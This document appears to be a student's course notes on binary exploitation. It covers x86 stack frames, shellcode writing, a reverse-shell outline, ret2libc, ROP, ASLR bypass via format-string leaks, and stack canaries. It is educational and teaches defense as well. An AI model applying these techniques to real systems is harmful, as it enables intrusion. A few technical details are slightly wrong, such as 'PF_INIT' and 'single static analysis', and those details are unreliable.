Software Security and Exploitation Notes

Basic Concepts
- ELF (9/10)
- C Language (9/10)
- Memory (9/15)
- Processes Address Space (9/15)
- Process Execution (9/15)
- Registers (9/17)
- x86 Instructions (9/24)
- Exploitation Tools (9/24)
Control-Flow Hijacking (9/22)
Code Injection
- NOP Sled (9/29)
- jmp %esp (9/29)
- Register Spring (9/29)
Shellcode Development
- Shellcode (10/1)
- Writing Shellcode (10/1)
- Reverse Shell (10/6)
Non-Executable Memory | Code Reuse
- Non-Executable Memory (10/8)
- mprotect (10/8)
- system (10/15)
- ret2libc Chain (10/15)
Partial ASLR | Return-Oriented Programming
- Address Space Layout Randomization (10/20)
- Dynamic Linking (10/27)
- Return-Oriented Programming (10/27)

Basic Concepts

ELF

An ELF is an executable, linkable, binary format. It is standard for UNIX-like systems.

An ELF file can represent executables, shared/static library, object files, and core dumps.

An executable (EXEC) is a library with a main function
An object file (REL) is a compiled C file that is not liked yet
A static library is statically linked in, which means that it is included as a big blob in the executable
A dynamic shared library (DYN) is linked in and has relative addresses (e.g. libc)

ELF file contents:

The header contains metadata about the file, such as the type of file (executable, shared library, etc.), the architecture it is intended for, and the entry point address.
The section header table describes the sections in the file, such as:
- .text: executable code
- .data: initialized global data
- .bss: uninitialized global data
- .rodata: read-only global data, such as string literals
The program header table describes the segment, which are loaded into memory when the program is run. Segments can contain multiple sections.

ELF file format

readelf is a useful utility for examining the contents of ELF files. Run it when readelf -e file.

C Language

C compilation process:

The C preprocessor takes the source code (.c) and preprocesses it by inserting the contents of header files (#include), expanding macros (#define), and handling conditional compilation directives (#if, #else). This becomes an intermediate file (.i).
The C compiler takes the intermediate file and converts it to architecture-specific assembly (.s). It takes it from the AST (GENERIC), to the next IR (GIMPLE), then to the SSA (single static analysis), and finally to the assembly code.
The assembler takes the assembly file, converts the assembly to machine code, and produces an object file (.o).
The linker takes one or more object files and combines them into a single executable file.
The loader loads the executable into memory and prepares it for execution. It sets up the necessary memory segments, resolves dynamic links (if any), and transfers control to the program's entry point (usually the main function).

Note that in this process, the object files and the final executable are ELF files.

C constructs:

extern means external to the compilation unit
static means internal to the compilation unit, so you cannot access it from other compilation units

C data types:

Type	Size	Value
`void`	N/A	No value
`char`	1 byte	Character
`short`	2 bytes	Whole number
`int`	4 bytes	Whole number
`long`	4 bytes*	Whole number
`long long`	8 bytes*	Whole number
`float`	4 bytes	Decimal number
`double`	8 bytes	Decimal number
`long double`	16 bytes	Decimal number
`pointer`	4 bytes*	Address

*This is based on a 32-bit architecture. On a 64-bit architecture, long and pointer would typically be 8 bytes.

References:

Memory

Memory can be referenced using its address, whose granularity and size depends on the architecture. In x86, every 8 bits (1 byte) of memory has its own address. In 32-bit systems, the address is 32 bits (4 bytes) long, and in 64-bit systems, the address is 64 bits (8 bytes) long.

This means that in x86 32-bit systems, there is roughly 2^32 bits = 4 GB of addressable memory. Around 1 GB is dedicated to the kernel and 3 GB is dedicated to userland.

Kernel and userland mappings

Memory is allocated by the kernel. The granularity of allocatable memory is also dependent on the architecture. Linux allocates memory in pages, which are typically 4 KB in size. The reason why this is important is because permission bits can only be set at the page level.

Virtual addresses are used for both resource management and process isolation. To translate from virtual addresses to physical addresses, page tables are managed by the operating system and assigned to each process. The hardware accesses this through the TLB (translation lookahead buffer).

TLDR: Addressable memory has a granularity of 1 byte, but allocatable memory has a granularity of 4 KB.

Process Address Space

A process is a running instance of a program. Each process has its own virtual address space. There is 1 GB dedicated to kernel mappings and 3 GB dedicated to userland.

The stack grows from high addresses to low addresses, but data structures inside of the stack are read from low addresses to high addresses. The heap grows from low addresses to high addresses.

The mmap region is the only region with DYN (dynamically linked) memory. It also has its own mmap heap.

Process address space

Process Execution

The operating system reads the ELF file and does the following:

Calculate the number of pages needed for the process
Carve the address space into page-aligned segments with permissions
Copy allocatable bytes from the ELF file into the address space
If there is no INTERP statement, jump to the entry point of the main ELF file.
If there is an INTERP statement, copy the new ELF file into the MMAP region and jump to its entry point.

From then on, the operating system is done.

The INTERP statement is used to describe the binary's dependencies in dynamically-loaded libraries. For the main ELF file, the INTERP will read like this: [Requesting program interpreter: /lib/ld-linux.so.2].

ld.so is a special helper that will help load all other libraries into memory. Similar to the operating system, ld.so will jump to the right place in the MMAP region of memory and copy the relevant dynamically-loaded library, like libc.so.

Registers

x86 has 8 general-purpose registers (EAX, EBX, ECX, ESI, EDI, EBP, and ESP) and two special-purpose registers (EFLAGS, EIP).

%eip points at the next instruction to be executed
%esp points at the top of the stack
%eax contains the return value of functions
%ebp points at the base of the current stack frame

Registers

x86 Instructions

The x86 instruction set (ISA) is variable length, which makes it more difficult to decode instructions.

The ISA can be presented with either AT&T syntax or IA-32 ASM (Intel) syntax, but AT&T syntax is more common in UNIX-like systems.

e.g. mov %eax, %ebx in AT&T syntax is mov ebx, eax in Intel syntax.

Symbol	Meaning
%eax	Register
$100	Constant
0x100	Memory address
(%eax)	Memory address in the register
offset(base, index, multipler)	Memory address in offset + base + index * multiplier

x86 uses little-endian format, which means that the least significant byte is stored at the lowest memory address.

Stack Frame

To initiate a function call, the caller makes a call <addr>, which:

Computes the return address, or the address of the next instruction after the call
Pushes the return address onto the stack in little endian
Loads %eip with the call target <addr>

To set up the new stack frame, the callee has a prologue (enter), which:

Pushes the old %ebp onto the stack
Sets the base pointer to the current top of the stack
Grows the stack down to allocate space for local variables

push   %ebp
mov    %esp,%ebp
sub    $0x218,%esp

To remove a stack frame, the callee has an epilogue (leave), which:

Copies %ebp to %esp
Pops the saved ebp from the stack back into %ebp

mov   %ebp, %esp
pop   %ebp

To transfer control back to the caller, the callee makes a ret, which:

Pops the return address from the top of the stack
Loads %eip with the return address
Resumes execution at the new %eip value

stack frame

Parameters and local variables are referenced relative to the base pointer %ebp. Positive offsets means that you are accessing parameters and negative offsets means that you are accessing local variables. For example, -0xc(%ebp) means that there is a local variable 12 bytes from %ebp.

Parameters are pushed onto the stack in reverse order. For example, the read function takes 3 parameters: int fd, void* buf, and size_t nbytes. The assembly code to call read(4, buf, 0x40) looks like this:

push   $0x40
lea    -0x18(%ebp),%eax
push   %eax
push   $0x0

lea is the only instruction that does not dereference the address. It just load the address into a register.

Exploitation Tools

Terminal commands

as --32 program.s -o program.o assembles in 32-bit.
cc -m32 program.c -o program compiles in 32-bit.
ldd prints the shared libraries required by each program.
objdump -d <exec> disassembles executable files.
readelf -s <file> or nm <file> lists symbols from object files.

GDB

info proc mappings prints the memory mappings of the current process
disassemble main disassembles the main function
b *addr sets a breakpoint at the given address
si steps one instruction
printf "%x\n", $ebp+0x8 prints addresses
x/x bffffdb0 examines memory
x/i system examines memory as instructions

Control-flow hijacking

Control-flow hijacking is the exploitation of memory vulnerabilities to change the control flow of a program.

This is commonly done using stack buffer overflows. The stack contains return addresses that are automatically pushed by the CPU during a call. Control data can easily be manipulated by changing the return addresses.

Code Injection

Stack jitter refers to how much the stack memory location changes across instances because of environment variables and commandline arguments placed on the top of the process address space. This causes problems with hardcoding addresses in the return address.

This problem can be mitigated by NOP sleds and jmp %esp.

NOP Sled

NOP sleds are sequences of NOP instructions (0x90) that slide the execution flow to the shellcode. NOP sleds allow the exploit to compensate for the fact that the shellcode may land in slightly different addresses due to different environment variables. But it does not entirely mitigate stack jitter because you still need to guess the address of the NOP landing pad, which is a specific stack address.

nop sled diagram

jmp %esp

In the jmp %esp technique, the return address is overwritten with an address to the instructions jmp %esp (ff e4). When ret is called, the %esp is decremented by 4 bytes and the return address is loaded into the %eip. At the next execution cycle, the %eip jumps to the top of the stack, where the shellcode is located. Note that the exploiter needs to be able to write beyond the return address.

This reliably mitigates stack jitter because there is no need to guess a specific stack address. It will always transfer control to the current location of the register.

jmp esp

Register Spring

A register spring uses any instruction that jumps to a register, such as jmp %eax or call %ebx. It is less constrained than jmp %esp.

This reliably mitigates stack jitter because it always transfers control to the location pointed by a specific register.

Shellcode Development

Shellcode

Shellcode is code that is injected into the attacker's area of control in order to exploit a memory corruption vulnerability.

Reverse shellcode connects back to the attacker's machine and gives the attacker a shell. Anything the attacker types is executed on the victim's machine; and anything the victim's machine outputs is sent back to the attacker.

Bind shellcode listens on a port and gives the attacker a shell when they connect to that port.

Writing Shellcode

Write the assembly. Assemble it. Then disassemble it to get the opcodes. A nice one-liner is as --32 program.s -o program && objdump -d program.

Each system call has a mapping between its arguments and registers. To make a system call, put its syscall number in %eax and its arguments in the appropriate registers. Then invoke int $0x80. The return value will be in %eax.

Avoid null bytes (0x00). They can terminate strings early in functions like strcpy().

Tricks to remove null bytes:

Instead of mov $0x0, xor registers with themselves
pushw can sometimes optimize out 00. e.g. pushw $0x0012 is \x66\x6a\x12 instead of \x66\x6a\x12\x00. This works for values up to 7f.
Because /bin/sh is 7 bytes, there will be a null byte at the end. You can instead push /bin//sh.

It might also be necessary to reduce payload size.

Tricks to reduce shellcode size:

In mov, use the lowest register necessary

You can also look for strings in the .rodata section instead of pushing byte-by-byte

Find the string in the binary with strings -t x <file> | grep <string>

strings -t x exec | grep string
3008 string

Find the offset and address of .rodata section using readelf -S <file> | grep .rodata

readelf -S exec | grep .rodata
[15] .rodata           PROGBITS        0bf07000 003000 0001b2 00   A  0   0  4

Calculate the address of the string by summing address of the .rodata section with the offset of the string within .rodata.
```
0bf07000 + (3008 - 3000) = 0bf07008
```

Reverse Shell

On the compromised machine, the shellcode:

Creates a socket
Changes stdin, stdout, and stderr to the socket
Connects to the attacker's machine
Executes /bin/sh

sfd = socket(PF_INIT, SOCK_STREAM, 0);
dup2(sfd, 2); // stderr
dup2(sfd, 1); // stdout
dup2(sfd, 0); // stdin
connect(sfd, &sin, sizeof(sin));
execve("/bin/sh", NULL, NULL);

Non-Executable Memory | Code Reuse

Non-Executable Memory

Around the early 2000s, computers started to implement non-executable memory to mitigate code injection attacks. Pages now had 3 permission bits:

Present (P)
Read/write (R/W)
Executable (X)

However, the return address can still be overwritten to point to existing code in the program or libraries. This exploit is called code reuse, ret2libc, or whole function reuse.

mprotect

mprotect is a function in libc that can set the protection on a region of memory.

Add parameters for mprotect to make the stack executable
Add shellcode where mprotect will return
Hijack the control flow to mprotect

system

system is a function in libc that executes a string as a command.

Add the string /bin/sh somewhere in memory
Add the address of /bin/sh as a parameter to system
Hijack the control flow to system

ret2libc Chain

We can also call multiple functions in a row through a ret2libc chain. At each link, we need to push:

The arguments to the function
The return address of the function
The address of the function to call

The return address of the function should be a gadget that lifts the stack up to the next function and then calls ret.

If the function argument is a pointer, make sure that you don't put it in the stack region that will be overwritten by new stack frames.

ret2libc chain

Partial ASLR | Return-Oriented Programming

Address Space Layout Randomization

Address space layout randomization (ASLR) is a probabilistic defense that artificially randomizes the starting address space of parts of the address space.

Partial ASLR randomizes the stack, mmap, and heap. Full ASLR also randomizes the main executable.

Constraints:

Stack needs to be 16 bit aligned (19 bits of entropy)
mmap needs to be 4 KB aligned (8 bits of entropy)
brk needs to be 4 KB aligned (13 bits of entropy)

Dynamic Linking

Dynamic linking

Global offset table (GOT) contains of addresses of external functions and global variables
Procedure linkage table (PLT) contains stubs that jump to the addresses in the GOT

Here is the process of calling an external function:

An external function in the .text section is called using the .plt stub.
```
bf06327:       e8 14 2d 14 fc          call   8049040 <read@plt>
```
The .plt stub is a set of three instruction, which starts with a jump to an address in the GOT.
```
08049040 <read@plt>:
8049040:       ff 25 4c 84 f0 0b       jmp    *0xbf0844c
8049046:       68 08 00 00 00          push   $0x8
804904b:       e9 d0 ff ff ff          jmp    8049020 <_init+0x20>
```
If the function is being called for the first time, the GOT slot will just point to the next instruction in the PLT stub, which pushes the function index and jumps to the dynamic linker.

If the function has been called before, the GOT slot will point to the actual function address.

Only functions used in the binary have PLT stubs. PLT addresses are not randomized by partial ASLR because they are part of the main executable.

Return-Oriented Programming

A gadget is a sequence of instructions that ends with a ret. Return-oriented programming (ROP) involves chaining gadgets together to perform arbitrary computation. Often, this involves setting up the stack frame above the original return address.

To find unaligned gadgets, search for ret (c3) instructions. Then, backtrack a few bytes to find useful instructions. One tool to do this automatically is ROPgadget

For partial ASLR, we can use ROP to set up arguments, particularly if they are memory addresses. Then we can call functions in the PLT, which is not randomized.

Return-oriented programming

Full ASLR | Just-In-Time Code Reuse

Full ASLR

Full ASLR randomizes the main executable in addition to everything that the partial ASLR randomizes. To have full ASLR, the main executable must not contain any absolute addresses; i.e. it must be position-independent code (PIC).

An executable with full ASLR is a DYN (Position-Independent Executable file). This is slightly different from library files, which are DYN (Shared object file).

Memory Disclosure

In format strings, %x will always print the last value from the stack and interpret it as a hexadecimal. This can be exploited to find the return address, creating a memory disclosure vulnerability.

printf("XXXX %x %x %x %x");

In practice, putting too many %x in the input string will result in overwriting the return address before we get to read it. Instead, we should use the %N$x notation to read specific stack locations.

printf("%138$x")

Just-In-Time Code Reuse

Get the return address through a memory disclosure vulnerability.
Calculate the base address of the main executable by subtracting the offset of the return address from the base address.

In other words, base addr = return addr - offset. We can find this offset using info proc mappings in GDB.
Calculate the addresses of gadgets and functions in the main executable

Note that gadgets must be taken from the main executable, not from libraries. Gadgets and functions will have fixed offsets from the base address, given by readelf -e <executable>.
Use a ROP chain to call functions in the PLT once again.

Just-in-time code reuse

Note that GDB disables ASLR by default. To enable it, run set disable-randomization off.

Stack Canaries/Cookies

Stack Canaries

A stack canary is a tripwire defense against return address overwrites. In particular, it defends against contiguous spatial memory violations in the stack. This defense needs to be enabled by the compiler.

The canary is a random 4-byte value that is placed in the stack frame of the protected function. A master "copy" of the canary is placed somewhere effectively random in the heap. When the function returns, the epilogue checks that the canary in the stack frame matches the master copy. If the canary matches, we can assume that all values above the canary in the stack frame are intact.

Stack canary

Note that this defense is not effective if there is a memory disclosure vulnerability that allows the attacker to read the canary value.

x86 Segmentation

The memory management unit (MMU) has a segmentation unit and a paging unit. The segmentation unit takes physical memory, divides it into chunks (segments), and runs processes in separate segments. The global descriptor table (GDT) is a data structure in the kernel that contains a segment descriptor for each segment. The segment descriptor which describes the segment's base address and limit address.

There are six, 2-byte segment selectors in x86: %cs, %ds, %es, %fs, %gs, and %ss. These selectors can be used to index the GDT to get a particular segment selector. Every address that references the code segment uses the %cs selector. Every address that references the stack segment uses the %ss selector.

Specifically, the 13 most-significant bits in the registers are used for indexing into the GDT to get a segment selector. The 3rd bit is the table indicator (TI), which specifies whether to use the GDT (0) or the local descriptor table (LDT) (1). The 2 least-significant bits are the requested privilege level (RPL).

For example, the address below resolves to GDT[%fs].base + 0x00010203.

mov %fs:0x00010203, %eax

The nice thing about segmentation is that it is not possible to find the address of the segment base through memory disclosure vulnerabilities. This is because the segment base is stored in the GDT, which lives in kernel space and is only accessible through segment selectors.

References:

Software Security and Exploitation Notes

Contents

Basic Concepts

ELF

C Language

Memory

Process Address Space

Process Execution

Registers

x86 Instructions

Stack Frame

Exploitation Tools

Control-flow hijacking

Code Injection

NOP Sled

jmp %esp

Register Spring

Shellcode Development

Shellcode

Writing Shellcode

Reverse Shell

Non-Executable Memory | Code Reuse

Non-Executable Memory

mprotect

system

ret2libc Chain

Partial ASLR | Return-Oriented Programming

Address Space Layout Randomization

Dynamic Linking

Return-Oriented Programming

Full ASLR | Just-In-Time Code Reuse

Full ASLR

Memory Disclosure

Just-In-Time Code Reuse

Stack Canaries/Cookies

Stack Canaries

x86 Segmentation